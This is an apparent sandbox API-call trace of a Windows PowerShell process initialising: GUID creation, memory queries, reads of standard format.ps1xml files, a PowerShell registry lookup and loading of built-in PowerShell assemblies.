	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x15286bb4, Data2=0x4370, Data3=0x4bbf, Data4=([0]=0xb1, [1]=0xf9, [2]=0x3b, [3]=0xb1, [4]=0xd0, [5]=0x5d, [6]=0x4a, [7]=0x93))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x941de671, Data2=0xe334, Data3=0x480d, Data4=([0]=0xad, [1]=0x13, [2]=0xa3, [3]=0x88, [4]=0x79, [5]=0x8f, [6]=0x41, [7]=0xa2))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xb53e5542, Data2=0x22a9, Data3=0x4710, Data4=([0]=0x82, [1]=0x63, [2]=0xc1, [3]=0x66, [4]=0x6f, [5]=0x9b, [6]=0x75, [7]=0xf6))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x49be6c28, Data2=0xfb5c, Data3=0x4300, Data4=([0]=0xba, [1]=0x66, [2]=0xa0, [3]=0x82, [4]=0x32, [5]=0x72, [6]=0x8e, [7]=0x4b))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf209b0c3, Data2=0xf6a9, Data3=0x4aa5, Data4=([0]=0xa7, [1]=0x28, [2]=0x5, [3]=0xba, [4]=0xcd, [5]=0x3d, [6]=0xea, [7]=0x31))) returned 0x0
	[0412.706] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xd762f343, Data2=0xc7a4, Data3=0x4b73, Data4=([0]=0xae, [1]=0x86, [2]=0x44, [3]=0xf9, [4]=0x91, [5]=0x75, [6]=0xfd, [7]=0x7c))) returned 0x0
	[0412.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x6336d3ec, Data2=0xebe6, Data3=0x4a8e, Data4=([0]=0xb5, [1]=0x17, [2]=0x16, [3]=0x1a, [4]=0x4e, [5]=0x73, [6]=0xd4, [7]=0x71))) returned 0x0
	[0412.707] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.707] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x81ddd24d, Data2=0x411a, Data3=0x4fa1, Data4=([0]=0x95, [1]=0xe6, [2]=0x2c, [3]=0xf4, [4]=0xb, [5]=0x7, [6]=0xb4, [7]=0x11))) returned 0x0
	[0412.707] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.707] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.708] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x527e6061, Data2=0x331f, Data3=0x4cad, Data4=([0]=0x81, [1]=0x94, [2]=0x29, [3]=0xb6, [4]=0x2a, [5]=0xc9, [6]=0x96, [7]=0x54))) returned 0x0
	[0412.708] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.708] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x9fbbfe05, Data2=0x1d47, Data3=0x484e, Data4=([0]=0xad, [1]=0xa0, [2]=0x33, [3]=0xc4, [4]=0xac, [5]=0x83, [6]=0x19, [7]=0xb8))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xefd9cbf2, Data2=0x75a1, Data3=0x4673, Data4=([0]=0x89, [1]=0xc1, [2]=0x24, [3]=0x3b, [4]=0x77, [5]=0xe1, [6]=0x85, [7]=0x78))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x292bdb11, Data2=0xed00, Data3=0x4c1b, Data4=([0]=0x9f, [1]=0x26, [2]=0x63, [3]=0xe5, [4]=0xf8, [5]=0xa0, [6]=0xd4, [7]=0x1d))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8671a06f, Data2=0x7b4b, Data3=0x46fe, Data4=([0]=0xbf, [1]=0x1b, [2]=0xf6, [3]=0x0, [4]=0x88, [5]=0x9, [6]=0xc6, [7]=0x13))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xeceabb84, Data2=0x90d6, Data3=0x44cd, Data4=([0]=0x8c, [1]=0x5e, [2]=0xfe, [3]=0xb, [4]=0x1, [5]=0xfd, [6]=0x39, [7]=0xb6))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4803a234, Data2=0x8c3b, Data3=0x41cd, Data4=([0]=0xb1, [1]=0x1e, [2]=0x7c, [3]=0x9, [4]=0x7f, [5]=0x28, [6]=0x20, [7]=0x92))) returned 0x0
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x8a113e0e, Data2=0x3289, Data3=0x4f2b, Data4=([0]=0x9a, [1]=0x27, [2]=0x15, [3]=0xea, [4]=0xf5, [5]=0x25, [6]=0x3b, [7]=0x8))) returned 0x0
	[0412.709] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.709] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xe08a7d9e, Data2=0x167d, Data3=0x4a5b, Data4=([0]=0x9d, [1]=0x37, [2]=0x58, [3]=0x83, [4]=0xe3, [5]=0xf2, [6]=0xdc, [7]=0xa2))) returned 0x0
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcd3644c0, Data2=0xce3b, Data3=0x4c2a, Data4=([0]=0xb1, [1]=0x2e, [2]=0xed, [3]=0xd0, [4]=0xe3, [5]=0xe1, [6]=0x9d, [7]=0x9f))) returned 0x0
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xa92adac6, Data2=0x3e91, Data3=0x471d, Data4=([0]=0x99, [1]=0x37, [2]=0x50, [3]=0xc8, [4]=0xab, [5]=0x33, [6]=0xf2, [7]=0xc1))) returned 0x0
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x2c4aa04b, Data2=0x7fe4, Data3=0x47e6, Data4=([0]=0xbc, [1]=0x8c, [2]=0x5f, [3]=0x3c, [4]=0x33, [5]=0xab, [6]=0x25, [7]=0x70))) returned 0x0
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf4e63301, Data2=0x558a, Data3=0x497a, Data4=([0]=0x9a, [1]=0xfd, [2]=0xb, [3]=0xfa, [4]=0x22, [5]=0xca, [6]=0x3b, [7]=0xce))) returned 0x0
	[0412.710] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x2e009ed4, Data2=0xb14e, Data3=0x4541, Data4=([0]=0x85, [1]=0x6b, [2]=0xfc, [3]=0xfd, [4]=0xe1, [5]=0xde, [6]=0x50, [7]=0xd0))) returned 0x0
	[0412.710] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xcbe8a293, Data2=0x5b5f, Data3=0x42e4, Data4=([0]=0xa8, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0xc0, [5]=0x2, [6]=0x87, [7]=0xf6))) returned 0x0
	[0412.710] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.711] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.711] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.711] VirtualQuery (in: lpAddress=0x20bef0, lpBuffer=0x20cdb0, dwLength=0x30 | out: lpBuffer=0x20cdb0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.711] SetErrorMode (uMode=0x1) returned 0x1
	[0412.711] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.711] GetFileType (hFile=0x2fc) returned 0x1
	[0412.711] SetErrorMode (uMode=0x1) returned 0x1
	[0412.711] GetFileType (hFile=0x2fc) returned 0x1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x8b4, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efc664, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efc664*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.712] ReadFile (in: hFile=0x2fc, lpBuffer=0x2efd248, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2efd248*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.713] SetErrorMode (uMode=0x1) returned 0x1
	[0412.713] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0412.713] SetErrorMode (uMode=0x1) returned 0x1
	[0412.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.713] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0412.713] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0412.713] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0412.714] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0412.714] CoTaskMemFree (pv=0x2b9000) 
	[0412.714] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0412.714] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x4aabeed9, Data2=0xc845, Data3=0x46aa, Data4=([0]=0xb1, [1]=0x84, [2]=0xc3, [3]=0x2b, [4]=0x36, [5]=0x54, [6]=0xf1, [7]=0xc8))) returned 0x0
	[0412.714] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0x65a51417, Data2=0xcd16, Data3=0x4272, Data4=([0]=0x8f, [1]=0xff, [2]=0xb8, [3]=0xbd, [4]=0x7f, [5]=0xc, [6]=0x18, [7]=0x9d))) returned 0x0
	[0412.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.715] SetErrorMode (uMode=0x1) returned 0x1
	[0412.715] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0412.715] GetFileType (hFile=0x2fc) returned 0x1
	[0412.715] SetErrorMode (uMode=0x1) returned 0x1
	[0412.715] GetFileType (hFile=0x2fc) returned 0x1
	[0412.715] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.715] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0x1000, lpOverlapped=0x0) returned 1
	[0412.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0xe98, lpOverlapped=0x0) returned 1
	[0412.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3a630, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3a630*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.716] ReadFile (in: hFile=0x2fc, lpBuffer=0x2f3b030, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d218, lpOverlapped=0x0 | out: lpBuffer=0x2f3b030*, lpNumberOfBytesRead=0x20d218*=0x0, lpOverlapped=0x0) returned 1
	[0412.716] CloseHandle (hObject=0x2fc) returned 1
	[0412.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.716] SetErrorMode (uMode=0x1) returned 0x1
	[0412.717] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d1c0 | out: lpFileInformation=0x20d1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0412.717] SetErrorMode (uMode=0x1) returned 0x1
	[0412.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.717] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2a8 | out: phkResult=0x20d2a8*=0x2fc) returned 0x0
	[0412.717] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d22c, lpData=0x0, lpcbData=0x20d228*=0x0 | out: lpType=0x20d22c*=0x1, lpData=0x0, lpcbData=0x20d228*=0x56) returned 0x0
	[0412.717] CoTaskMemAlloc (cb=0x5a) returned 0x2b9000
	[0412.717] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d1fc, lpData=0x2b9000, lpcbData=0x20d1f8*=0x56 | out: lpType=0x20d1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d1f8*=0x56) returned 0x0
	[0412.717] CoTaskMemFree (pv=0x2b9000) 
	[0412.717] RegCloseKey (hKey=0x2fc) returned 0x0
	[0412.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0412.718] VirtualQuery (in: lpAddress=0x20bd40, lpBuffer=0x20cc00, dwLength=0x30 | out: lpBuffer=0x20cc00*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.718] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xccc24cf8, Data2=0xaf71, Data3=0x4290, Data4=([0]=0x98, [1]=0x41, [2]=0xe1, [3]=0xf7, [4]=0xb1, [5]=0xbe, [6]=0x8c, [7]=0xe6))) returned 0x0
	[0412.718] CoCreateGuid (in: pguid=0x20d4d0 | out: pguid=0x20d4d0*(Data1=0xf3bebf1, Data2=0x6642, Data3=0x4e13, Data4=([0]=0x89, [1]=0xfd, [2]=0xb6, [3]=0x9c, [4]=0xfb, [5]=0x94, [6]=0x3a, [7]=0x95))) returned 0x0
	[0413.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0413.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0413.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0413.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0413.110] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0413.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0413.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0413.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20d270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
